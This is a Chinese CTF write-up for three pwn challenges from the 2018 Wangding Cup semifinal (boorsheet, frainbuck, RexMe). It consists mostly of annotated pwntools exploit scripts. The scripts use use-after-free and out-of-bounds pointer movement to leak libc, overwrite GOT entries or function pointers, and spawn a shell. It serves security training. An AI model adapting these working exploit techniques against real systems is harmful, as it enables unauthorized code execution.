[2018网鼎杯] 半决赛writeup(pwn)

boorsheet

  • 利用uaf劫持程序控制流
from pwn import *

# pwntools debug logging: every byte exchanged with the target is echoed,
# so a recvuntil() waiting on a prompt that never matches shows up in the
# log instead of looking like a silent hang.
context.log_level = 'debug'

def create_char(length,name,type_char):
    """Drive menu option 1 of boorsheet (create a character).

    ``length`` is sent as the size answer, ``name`` is sent raw without a
    trailing newline, ``type_char`` is sent as a line. Each prompt
    fragment is whatever the challenge binary prints; ``*after`` blocks
    until that fragment has been read and then answers it. Uses the
    module-level tube ``p``.
    """
    p.sendlineafter('choice : ', '1')
    p.sendlineafter(' name :', str(length))
    p.sendafter('character :', name)
    p.sendlineafter('character :', type_char)

def view_char():
    """Pick menu option 2 of boorsheet (view); output is left unread on ``p``."""
    p.sendlineafter('choice : ', '2')

def delete_char(index):
    """Pick menu option 3 of boorsheet and answer the index prompt with ``index``."""
    p.sendlineafter('choice : ', '3')
    p.sendlineafter('to eat:', str(index))

def clean():
    """Pick menu option 4 of boorsheet on the module-level tube ``p``."""
    p.sendlineafter('choice : ', '4')

def yincang():
    """Enter the hidden menu ("yincang" = hidden) by answering the choice prompt with 1337."""
    p.sendlineafter('choice : ', '1337')

def new(size,name,content):
    """Hidden-menu ``new`` command: allocate a note of ``size`` bytes.

    ``name`` and ``content`` are sent as lines, so each gets a trailing
    newline. The ``$ `` fragment is the hidden menu's shell-style prompt.
    """
    p.sendlineafter('$ ', 'new')
    p.sendlineafter('size:', str(size))
    p.sendlineafter('name:', name)
    p.sendlineafter('content:', content)

def edit(index,name,content):
    """Hidden-menu ``edit`` command: rewrite name and content of note ``index``.

    Both payload arguments are sent as lines (newline appended).
    """
    p.sendlineafter('$ ', 'edit')
    p.sendlineafter('index:', str(index))
    p.sendlineafter('name:', name)
    p.sendlineafter('content:', content)

def delete(index):
    """Hidden-menu ``delete`` command for note ``index``."""
    p.sendlineafter('$ ', 'delete')
    p.sendlineafter('index:', str(index))

def show(index):
    """Hidden-menu ``show`` command for note ``index``; the caller reads the output."""
    p.sendlineafter('$ ', 'show')
    p.sendlineafter('index:', str(index))

def mark(index,mark_info):
    """Hidden-menu ``mark`` command: attach ``mark_info`` to note ``index``.

    Note the index prompt here ends in ``mark:`` rather than ``index:``.
    """
    p.sendlineafter('$ ', 'mark')
    p.sendlineafter('mark:', str(index))
    p.sendlineafter('info:', mark_info)

def show_mark(index):
    """Hidden-menu ``show_mark`` command for mark ``index``; output is left on ``p``."""
    p.sendlineafter('$ ', 'show_mark')
    p.sendlineafter('index:', str(index))

def delete_mark(index):
    """Hidden-menu ``delete_mark`` command for mark ``index``."""
    p.sendlineafter('$ ', 'delete_mark')
    p.sendlineafter('index:', str(index))

def edit_mark(index):
    """Hidden-menu ``edit_mark`` command for mark ``index`` (no payload is sent here)."""
    p.sendlineafter('$ ', 'edit_mark')
    p.sendlineafter('index:', str(index))

# Local process; puts_got is read from the ELF and added to elf_base
# further down, i.e. the script treats the binary as position-independent.
p = process('./boorsheet')
elf = ELF('./boorsheet')
puts_got = elf.got['puts']

# Enter the hidden menu (option 1337), then create one note and attach
# one mark to it.
yincang()
new(0x10,'a','1')
mark(0,'b')

#use uaf to hijack note->content --> struct_mark
# delete_mark(0) frees the mark struct while, per the comment above, the
# note keeps pointing at it. That dangling pointer is the root cause; the
# fix on the binary's side is to clear the reference when the mark is
# freed. The next allocation of matching size reuses the freed memory.
delete_mark(0)
#leak elf_base
# The 0x18-byte content of the new note presumably lands on the freed
# mark; show(1) prints it, and right after the 0xf '2's and their NUL
# terminator come 8 bytes the writeup treats as a code pointer located
# 0x11E6 bytes from the image base (a value specific to this binary).
new(0x18,'b','2'*0xf)
show(1)
p.recvuntil('2'*0xf+'\x00')
elf_base = u64(p.recv(8)) - 0x11E6
log.success('elf_base addr : 0x%x'%elf_base)
#leak libc_base
# Rewrite the overlapping mark so its pointer field is puts@GOT (two
# 32-bit fields precede it; [:6] keeps the 6 low bytes of the address,
# presumably because the top two are NUL anyway). show_mark(0) then
# prints what that pointer refers to: the resolved puts address.
edit(1,'b',p32(0) + p32(0) + p64(puts_got+elf_base)[:6])
show_mark(0)
# Hard-coded libc offsets, valid only for the libc build the challenge
# shipped with.
offset_puts = 0x000000000006f690
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
# recv(6) is not preceded by a recvuntil, so it assumes the 6 leaked
# bytes are the very next output on the tube.
libc_base = u64(p.recv(6).ljust(8,'\x00')) - offset_puts
log.success('libc_base addr : 0x%x'%libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
log.success('system addr : 0x%x'%system_addr)
log.success('binsh addr : 0x%x'%binsh_addr)

#hijack *puts_function -> system('/bin/sh\x00')
# Same layout as the leak step, now filling both the data pointer and the
# function pointer that follows it; per the comment above, show_mark calls
# that function pointer on the data pointer.
edit(1,'b',p32(0) + p32(0) + p64(binsh_addr) + p64(system_addr))
#trigger system('/bin/sh\x00')
show_mark(0)


p.interactive()


frainbuck

  • 利用类似brainfuck进行数组越界泄漏libc改got表
from pwn import *

# pwntools debug logging: every byte exchanged with the target is echoed,
# which makes a recvuntil() stuck on a mismatched prompt visible.
context.log_level = 'debug'

# Local process plus the libc the challenge links against. The libc path
# is hard-coded, so _IO_2_1_stdout_offset and the 0x45216 gadget offset
# below only hold for that one build.
p = process('./frainbuck')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# Addresses inside the challenge binary, taken from the writeup and used
# as absolute values below (i.e. the binary is assumed not to be PIE):
# the stdout FILE* slot, the interpreter's data pointer, and exit@GOT.
stdout = 0x602080
ptr_data = 0x6020C0
exit_got = 0x602060
_IO_2_1_stdout_offset = libc.symbols['_IO_2_1_stdout_']

# Reference table for the interpreter's commands. This is a bare string
# statement, not a comment; it has no runtime effect.
'''
> ++ptr;
< --ptr;
+ ++*ptr;
- --*ptr;
. putchar(*ptr);
, *ptr=getchar();
[ while(*ptr){
] }
'''

# The bug the writeup relies on: '<' moves the data pointer with no lower
# bound check, so it walks out of the data array into the binary's
# writable data. Step 1: move onto the stdout slot; '[.>]' prints bytes
# until the first NUL, i.e. the 6 non-zero bytes of the stdout FILE
# pointer (the libc leak read by recv(6) below). Step 2: '<'*6 walks back
# over those 6 bytes, the pointer is moved onto exit@GOT, and ',[>,]'
# reads replacement bytes from stdin until a NUL. A bounds check on ptr
# is the fix; a read-only GOT (full RELRO) would block the second step.
payload = '<'*(ptr_data - stdout)
payload += '[.>]'
payload += '<'*6
payload += '<'*(stdout - exit_got)
payload += ',[>,]'

#gdb.attach(p,'b *0x04009A9')
p.recvuntil('code: ')
p.sendline(payload)

# recv(6) is not preceded by a prompt check, so it assumes the leaked
# bytes are the next output on the tube.
libc_base = u64(p.recv(6).ljust(8,'\x00')) - _IO_2_1_stdout_offset
one_gadget = libc_base + 0x45216
log.success('libc_base addr : 0x%x'%libc_base)
log.success('one_gadget addr : 0x%x'%one_gadget)

# Consumed by the ',[>,]' loop above; p64 of a user-space address ends in
# NUL bytes, which is what terminates that loop.
p.send(p64(one_gadget))

p.interactive()

RexMe

  • uaf利用name泄漏libc,改写got表
from pwn import *

# pwntools debug logging: every byte exchanged with the target is echoed,
# so a recvuntil() waiting on a prompt that never matches shows up in the
# log instead of looking like a silent hang.
context.log_level = 'debug'

def login(name):
    """Main-menu option 1 of RexMe: log in as ``name``.

    The name is sent raw with an explicit NUL terminator appended and no
    newline. ``view_profile`` sends the same ``'1'`` after login, so that
    one presumably belongs to a different (logged-in) menu. Uses the
    module-level tube ``p``.
    """
    p.sendlineafter('choice:', '1')
    p.sendafter('name:', name + '\x00')

def register(size,name,age,des):
    """Main-menu option 2 of RexMe: create an account.

    ``size`` and ``age`` are sent as lines; ``name`` and ``des`` are sent
    raw (no newline, no NUL added) so the caller controls every byte.
    """
    p.sendlineafter('choice:', '2')
    p.sendlineafter(' size:', str(size))
    p.sendafter('name:', name)
    p.sendlineafter('age:', str(age))
    p.sendafter('description:', des)

def view_profile():
    """Logged-in menu option 1 of RexMe: print the profile (output left on ``p``)."""
    p.sendlineafter('choice:', '1')

def updata_profile(name,age,des):
    """Logged-in menu option 2 of RexMe: overwrite name, age and description.

    Same send/sendline split as ``register``: ``name`` and ``des`` go out
    raw, ``age`` as a line. (The misspelled name is kept for callers.)
    """
    p.sendlineafter('choice:', '2')
    p.sendafter('name:', name)
    p.sendlineafter('age:', str(age))
    p.sendafter('description:', des)

def add_or_delete_friend(name,a_d):
    """Logged-in menu option 3 of RexMe: add (``'a'``) or delete (``'d'``) friend ``name``.

    ``name`` is sent raw with a NUL terminator appended; ``a_d`` is sent
    as a line in answer to the ``(a/d)`` prompt.
    """
    p.sendlineafter('choice:', '3')
    p.sendafter('name:', name + '\x00')
    p.sendlineafter('this friend?(a/d)', a_d)

def send_a_message(name,title,content):
    """Logged-in menu option 4 of RexMe: message ``name`` with ``title``/``content``.

    Recipient is NUL-terminated; title and content are sent raw.
    """
    p.sendlineafter('choice:', '4')
    p.sendafter('msg to:', name + '\x00')
    p.sendafter('title:', title)
    p.sendafter('content:', content)

def view_your_message():
    """Logged-in menu option 5 of RexMe (output left unread on ``p``)."""
    p.sendlineafter('choice:', '5')

def logout():
    """Logged-in menu option 6 of RexMe: return to the main menu."""
    p.sendlineafter('choice:', '6')


# Local process, the challenge ELF (for strdup@GOT) and the libc it links
# against. `libc` is loaded but never consulted below: the offsets further
# down are hard-coded constants pinned to one libc build.
p = process('./RexMe')
elf = ELF('./RexMe')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# strdup@plt (hard-coded) and strdup@got (from the ELF), both used as
# absolute addresses, i.e. the binary is treated as non-PIE.
strdup_plt = 0x4007f6
strdup_got = elf.got['strdup']

# Two accounts; log in as 'a'*8, add 'b'*8 as a friend and delete it
# again, log out. Per the heading, this add/delete pair leaves a dangling
# reference to the 'b' name buffer (use-after-free); the fix on the
# binary's side is to drop the reference when the buffer is freed.
register(10,'a'*8,20,'a')
register(10,'b'*8,20,'b')
#gdb.attach(p,'b *0x40142F')
login('a'*8)
add_or_delete_friend('b'*8,'a')
add_or_delete_friend('b'*8,'d')
logout()

#leak libc
# A third profile whose raw name bytes are strdup@GOT, a login whose name
# is strdup@plt, one message to 'a'*8, then view_profile. The page does
# not show which freed buffer each step reuses; the observable result is
# that the output after 'Username:' carries the resolved strdup address.
register(10,p64(strdup_got),20,'b')
login(p64(strdup_plt))
send_a_message('a'*8,'a','a')
view_profile()
# Hard-coded libc offsets (see note above); libc.symbols would derive
# them from the loaded file instead.
offset_strdup = 0x000000000008b470
offset_system = 0x0000000000045390
p.recvuntil('Username:')
libc_base = u64(p.recv(6).ljust(8,'\x00')) - offset_strdup
log.success('libc_base addr : 0x%x'%libc_base)
# one_gadget is computed and logged but never used; the overwrite below
# uses system_addr.
one_gadget = libc_base + 0x45216
log.success('one_gadget addr : 0x%x'%one_gadget)
system_addr = libc_base + offset_system
log.success('system addr : 0x%x'%system_addr)

#hijack strdup_got -> system_addr
# The write goes through the profile's name field (presumably the name
# pointer now aliases strdup@GOT). A read-only GOT (full RELRO) would
# stop this step.
updata_profile(p64(system_addr),'20','b')

#system('/bin/sh\x00')
# send_a_message inlined without the content step: the title is the
# first string handled by strdup after the overwrite, so the shell
# presumably spawns before 'content:' is ever printed (the binary itself
# is not shown on this page).
p.recvuntil('choice:')
p.sendline('4')
p.recvuntil('msg to:')
p.send('a'*8+'\x00')
p.recvuntil('title:')
p.send('/bin/sh\x00')
p.interactive()